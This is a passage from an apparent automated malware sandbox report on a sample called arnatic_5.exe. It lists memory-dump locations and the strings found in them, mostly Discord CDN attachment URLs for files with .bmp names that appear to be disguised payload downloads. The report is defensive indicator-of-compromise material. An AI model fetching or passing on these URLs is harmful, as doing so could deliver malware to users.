arnatic_5.exe, 00000013.00000003.405599011.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931600723630764112/real1401.bmp
Source: arnatic_5.exe, 00000013.00000003.444466466.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.441051678.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481499097.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487716090.0000000000B57000.00000004.00000020.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931600723630764112/real1401.bmpC:
Source: arnatic_5.exe, 00000013.00000003.415818417.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421224278.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406228178.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405599011.0000000003F39000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931600723630764112/real1401.bmpF
Source: arnatic_5.exe, 00000013.00000003.415818417.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421224278.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406228178.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405599011.0000000003F39000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931600723630764112/real1401.bmperU
Source: arnatic_5.exe, 00000013.00000003.415818417.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421224278.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406228178.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405599011.0000000003F39000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931600723630764112/real1401.bmppF
Source: arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/928293476800532500/utube0501.bmp
Source: arnatic_5.exe, 00000013.00000003.409993066.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.391018056.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393463301.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427086754.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456992136.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422737689.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432338816.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432737345.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443820817.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443352919.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427534412.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417510636.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404358539.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389251267.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480687537.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422178546.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386800947.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489805744.00000000064E2000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/928293476800532500/utube0501.bmpQb
Source: arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.382494152.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367525181.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.380504777.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366988052.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368167749.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379788149.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368354366.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.381720094.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/930749897811062804/help1201.bmp
Source: arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/930849718240698368/Roll.bmp
Source: arnatic_5.exe, 00000013.00000003.409993066.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.391018056.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393463301.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427086754.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456992136.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422737689.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.382494152.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432338816.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432737345.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443820817.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443352919.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427534412.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417510636.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404358539.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389251267.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480687537.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368167749.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422178546.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386800947.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489805744.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.381720094.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931152760785760336/stalkar_4mo.bmp
Source: arnatic_5.exe, 00000013.00000003.382494152.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368167749.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.381720094.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931152760785760336/stalkar_4mo.bmpH
Source: arnatic_5.exe, 00000013.00000003.409993066.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.391018056.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393463301.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427086754.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422737689.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432338816.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432737345.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443820817.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443352919.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427534412.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417510636.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404358539.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389251267.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422178546.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386800947.00000000064E2000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931152760785760336/stalkar_4mo.bmphb
Source: arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.382494152.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367525181.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.380504777.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366988052.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368167749.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379788149.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368354366.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.381720094.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931210851506065438/new_v11.bmp
Source: arnatic_5.exe, 00000013.00000003.382494152.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368167749.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.381720094.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931210851506065438/new_v11.bmp?
Source: arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367525181.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.380504777.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366988052.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379788149.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368354366.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931210851506065438/new_v11.bmpm
Source: arnatic_5.exe, 00000013.00000003.382494152.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368167749.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.381720094.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931269844253442058/LeGXxX6.bmp
Source: arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367525181.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.380504777.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366988052.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379788149.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368354366.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931269844253442058/LeGXxX6.bmpE
Source: arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367525181.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.380504777.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366988052.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379788149.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368354366.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931269844253442058/LeGXxX6.bmpu
Source: arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931285223709225071/russ.bmp
Source: arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367525181.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.380504777.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366988052.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379788149.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368354366.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931285223709225071/russ.bmp=
Source: arnatic_5.exe, 00000013.00000003.409993066.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.391018056.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393463301.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427086754.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422737689.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.382494152.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432338816.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432737345.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443820817.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443352919.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427534412.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367525181.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417510636.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404358539.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389251267.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.380504777.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366988052.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368167749.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379788149.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422178546.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386800947.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368354366.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.381720094.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931469914336821298/softer1401.bmp
Source: arnatic_5.exe, 00000013.00000003.382494152.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368167749.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.381720094.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931474583054352464/newt.bmp
Source: arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367525181.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.380504777.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366988052.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379788149.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368354366.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931474583054352464/newt.bmpe
Source: arnatic_5.exe, 00000013.00000003.409993066.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.391018056.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393463301.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427086754.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456992136.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422737689.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.382494152.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432338816.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432737345.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443820817.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443352919.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427534412.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367525181.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417510636.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404358539.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389251267.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.380504777.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480687537.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366988052.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368167749.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379788149.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422178546.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386800947.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368354366.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489805744.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.381720094.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	String found in 